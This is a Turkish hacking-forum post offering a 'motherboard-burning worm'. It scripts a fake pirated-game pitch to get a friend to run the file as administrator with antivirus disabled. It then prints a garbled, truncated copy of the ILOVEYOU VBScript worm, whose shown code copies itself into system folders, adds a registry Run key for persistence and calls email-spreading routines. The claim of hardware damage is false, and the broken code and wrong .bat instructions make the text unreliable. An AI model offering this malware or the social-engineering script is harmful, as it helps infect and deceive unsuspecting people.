Ana kart yakan worms

Arkadaşlar ilk önce söyleyeyim bunları yönetici olarak çalıştırmaları gerekir.Yani sosyal mühendisliğinizin iyi olması gerekir.Ve Bunları Not Defterine Kopyala-Yapıştır yapıp...

Arkadaşlar ilk önce söyleyeyim bunları yönetici olarak çalıştırmaları gerekir.Yani sosyal mühendisliğinizin iyi olması gerekir.Ve Bunları Not Defterine Kopyala-Yapıştır yapıp Farkl kaydet deyip mesela OYUN.bat diye kayıt edin.Şimdi Yedirme Yöntemi.Mesela:


+Kanka biliyor musun yeni bir oyun çıkmış ben korsanını buldum al setup çok güzel.Ama unutma sakın
Yönetici olarak çalıştır bide çalıştırırken antivirüs ü kapat.
-Tamam Kanka Bekle
+Tamam KanKa
-Kanka PC ye bişi oluyo aman tanrım n'aptın
+kanka bende hiç birşey olmadı istersen gel bak
-tamam geliyorum

o sırada farklı bir oyun açıp yutturabilirsiniz

Gibi olabilir.Hemen Kodları Vereyim.Bu virüs format attırsa bile anakarta zarar verdiği için çok kötü sonuçlar doğurabilir

kodlar şunlar:

rem delete -pcas(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso. openTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"




buda virüstotal:

https://www.virustotal.com/gui/file...5a6aa9d4af5cde09fa28a9290dcffeb2351/detection
 
Moderatörün son düzenlenenleri:
131,839Konular
3,271,903Mesajlar
316,362Kullanıcılar
kayrasnglSon Üye
Üst Alt